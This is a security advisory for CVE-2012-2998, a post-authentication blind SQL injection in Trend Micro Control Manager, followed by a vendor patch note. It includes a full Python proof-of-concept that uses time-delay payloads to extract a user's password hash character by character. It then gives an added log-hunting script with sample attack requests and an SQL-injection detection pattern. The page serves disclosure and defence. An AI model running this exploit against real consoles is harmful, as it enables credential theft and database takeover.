Security Research

Security Vulnerability
Trend Micro Control Manager AdHocQuery_Processor.aspx SQL Injection Vulnerability

Published: 2012-09-27
Updated: 2012-09-28

Affected systems:
Trend Micro Control Manager 6.0
Trend Micro Control Manager 5.5
Description:
BUGTRAQ ID: 55706
CVE ID: CVE-2012-2998

Trend Micro Control Manager is a centralized management console that tracks security performance and reports malware events and policy violations while automating routine security administration tasks.

Trend Micro Control Manager contains a SQL injection vulnerability: the value passed in the id parameter to AdHocQuery_Processor.aspx is used in a SQL query without proper sanitization. The flaw is reachable only with an authenticated console session (post-auth), but a successful exploit lets the attacker control the application, read or modify data, or reach other weaknesses in the underlying database.

<*Source: Tom Gregory
  
  Links: http://secunia.com/advisories/50760/
         http://secunia.com/advisories/50748/
         http://esupport.trendmicro.com/solution/en-us/1061043.aspx
*>

Test method:

WARNING

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users act at their own risk!

#!/usr/bin/env python
# Python 2 proof of concept (urllib2, raw_input, print statement).

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy (@otoy_rood) & modpr0be (@modpr0be)
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and
# policy violations, and automates routine tasks. New features include a customizable dashboard
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network,
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# Vulnerability found in the AdHocQuery module inside the id parameter. By injecting a payload after
# the id parameter, say ' WAITFOR DELAY '0:0:5'--, the web application hangs for 5 seconds,
# which leads to the conclusion that the web application is vulnerable to time-based SQL injection.

# The script below is just a proof of concept; you must get a cookie. This vulnerability will need some
# attack vector to be exploited, but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released


import sys, time, urllib, urllib2

# Python 2.7.9+ verifies HTTPS certificates by default; the console normally
# presents a self-signed certificate, so turn verification off for this PoC.
try:
    import ssl
    ssl._create_default_https_context = ssl._create_unverified_context
except AttributeError:
    pass

print """
#===============================================================#
|                                                               |
|            ___|                   |                           |
|          \___ \  __ \   _ \ __ \  __|  _ \  __| _` |          |
|                | |   |  __/ |   | |    __/ |   (   |          |
|          _____/  .__/ \___|_|  _|\__|\___|_|  \__,_|          |
|                 _|                                            |
|                                                               |
|    Trend Micro Control Manager BlindSQLi Password Extractor   |
|                         CVE-2012-2998                         |
|          by otoy & modpr0be (research[at]spentera.com)        |
|                                                               |
#===============================================================#
"""
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' % host
# SQLi delay in seconds; for a remote target increase the delay (default: 2 seconds)
delay = 2

# Authenticated console session; the vulnerability is post-auth, so replace
# this with the cookie of a valid login before running.
cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")


def Hex2Des(item):
    # Map a nibble 0..15 to the ASCII code of its lowercase hex digit
    # ('0'..'9', 'a'..'f'): the hash is compared one hex character at a time.
    return ord('%x' % item)


def konek(m, n):
    # Time-based boolean inference (query borrowed from sqlmap): if the m-th
    # character of the first non-blank password hash in tb_UserInfo has a code
    # greater than n, the server sleeps for `delay` seconds, otherwise it
    # answers immediately. The payload is appended to a legitimate query GUID.
    query = ("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
             " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" % (m, n, delay))

    values = {'Action': 'View',
              'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8' + query,
              'asc': 'true',
              'Sort': 7,
              'paging': 10}

    url = "%s?%s" % (target, urllib.urlencode(values))
    req = urllib2.Request(url)
    req.add_header('Cookie', cookie)
    try:
        starttime = time.time()
        urllib2.urlopen(req)
        endtime = time.time()
        # Whole seconds elapsed; anything below `delay` means the condition was false.
        return int(endtime - starttime)
    except Exception:
        print '\n[-] Uh oh! Exploit fail..'
        sys.exit(0)


print "[+] Using Time-Based method with %ds delay." % int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')
sys.stdout.flush()

starttime = time.time()
# 32 hex characters; candidates are tried in ascending order, so the first one
# that does NOT trigger the delay is the character at that position.
for m in range(1, 33):
    for n in range(0, 16):
        wkttunggu = konek(m, Hex2Des(n))
        if wkttunggu < delay:
            sys.stdout.write(chr(Hex2Des(n)))
            sys.stdout.flush()
            break
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" % int(endtime - starttime)

Recommendations:
Vendor patch:

Trend Micro
-----------
Trend Micro has published a security advisory (1061043) and a corresponding patch:

1061043: Critical patch available for SQL injection attacks in Control Manager (TMCM)

Link: http://esupport.trendmicro.com/solution/en-us/1061043.aspx
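Applying the critical patch is the fix; until it is on every console, the request shape the PoC uses is easy to hunt for in the IIS logs of the Control Manager server. The following is an added example, not from the advisory, from Spentera or from Trend Micro: it parses IIS W3C log lines, isolates requests to /webapp/AdHocQuery/AdHocQuery_Processor.aspx, URL-decodes the id parameter and flags any value that is not the GUID the page expects. The log lines are constructed samples, the field list assumes the IIS W3C default with time-taken enabled (adapt it to your #Fields: header), and the SQL token regex is this example's own heuristic.

```python
"""Hunt for CVE-2012-2998 exploitation attempts in IIS W3C logs.

Added example, not from the advisory or from Trend Micro. The request path and
parameters come from the page; SAMPLE_LOG is constructed data and the field
list is the common IIS default with time-taken enabled.
"""
import re
from urllib.parse import parse_qs

TARGET_STEM = "/webapp/AdHocQuery/AdHocQuery_Processor.aspx"
# A legitimate id is a GUID; anything else in that parameter is suspect.
GUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
# Tokens seen in the page's payloads plus the usual injection suspects (heuristic).
SQL_HINTS = re.compile(r"waitfor\s+delay|'\s*(?:or|and|if)\b|--|/\*|\bselect\b|\bunion\b", re.I)

# Constructed IIS log: one benign query, the two payload shapes from the page,
# a non-GUID id, and an unrelated request. IIS writes '+' for spaces in fields.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2012-09-28 10:15:02 10.0.0.5 GET /webapp/AdHocQuery/AdHocQuery_Processor.aspx Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8&asc=true&Sort=7&paging=10 443 - 10.0.0.77 Mozilla/5.0+(Windows+NT+6.1) 200 0 0 187
2012-09-28 10:15:09 10.0.0.5 GET /webapp/AdHocQuery/AdHocQuery_Processor.aspx Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8%27+WAITFOR+DELAY+%270%3A0%3A5%27-- 443 - 10.0.0.77 Python-urllib/2.7 200 0 0 5031
2012-09-28 10:15:17 10.0.0.5 GET /webapp/AdHocQuery/AdHocQuery_Processor.aspx Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8%27+IF%28UNICODE%28SUBSTRING%28%28SELECT+MIN%28ISNULL%28CAST%28Password+AS+NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29+FROM+db_ControlManager.dbo.tb_UserInfo+WHERE+CONVERT%28NVARCHAR%284000%29%2CPassword%29%3ECHAR%2832%29%29%2C1%2C1%29%29+%3E+48%29+WAITFOR+DELAY+%270%3A0%3A2%27--&asc=true&Sort=7&paging=10 443 - 10.0.0.77 Python-urllib/2.7 200 0 0 2019
2012-09-28 10:16:40 10.0.0.5 GET /webapp/AdHocQuery/AdHocQuery_Processor.aspx Action=View&id=1&asc=true&Sort=7&paging=10 443 - 10.0.0.77 Mozilla/5.0+(Windows+NT+6.1) 500 0 0 42
2012-09-28 10:17:03 10.0.0.5 GET /webapp/Login.aspx - 443 - 10.0.0.88 Mozilla/5.0+(Windows+NT+6.1) 200 0 0 15
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the last #Fields: line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields is None:
            raise ValueError("record before any #Fields: header")
        else:
            values = line.split(" ")
            if len(values) == len(fields):        # skip truncated records
                yield dict(zip(fields, values))


def classify_id(decoded_id):
    """None for a well-formed GUID; otherwise the reason the value looks injected."""
    if GUID_RE.match(decoded_id):
        return None
    hit = SQL_HINTS.search(decoded_id)
    return "SQL token %r in id" % hit.group(0) if hit else "id is not a GUID"


def hunt(text):
    """Return the suspicious AdHocQuery requests found in IIS W3C log text."""
    findings = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != TARGET_STEM.lower():
            continue
        params = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
        decoded_id = params.get("id", [""])[0]      # parse_qs also URL-decodes
        reason = classify_id(decoded_id)
        if reason:
            findings.append({
                "when": rec["date"] + " " + rec["time"],
                "src": rec.get("c-ip"),
                # cs-username stays "-" under ASP.NET forms authentication; the
                # console's own audit log is needed to attribute the session.
                "user": rec.get("cs-username"),
                "agent": rec.get("cs(User-Agent)"),
                "status": rec.get("sc-status"),
                "time_taken_ms": rec.get("time-taken"),
                "id": decoded_id,
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print("%(when)s %(src)s %(agent)s status=%(status)s %(time_taken_ms)sms %(reason)s" % f)
```

Because the injection is time-based, a matching id together with a time-taken close to a multiple of a few seconds is strong corroboration, and a burst of such requests from one source (hundreds per extracted hash, as the PoC's loop implies) is the typical pattern; the 500 on the bare "id=1" line is what a probe that breaks the query tends to leave behind.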

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.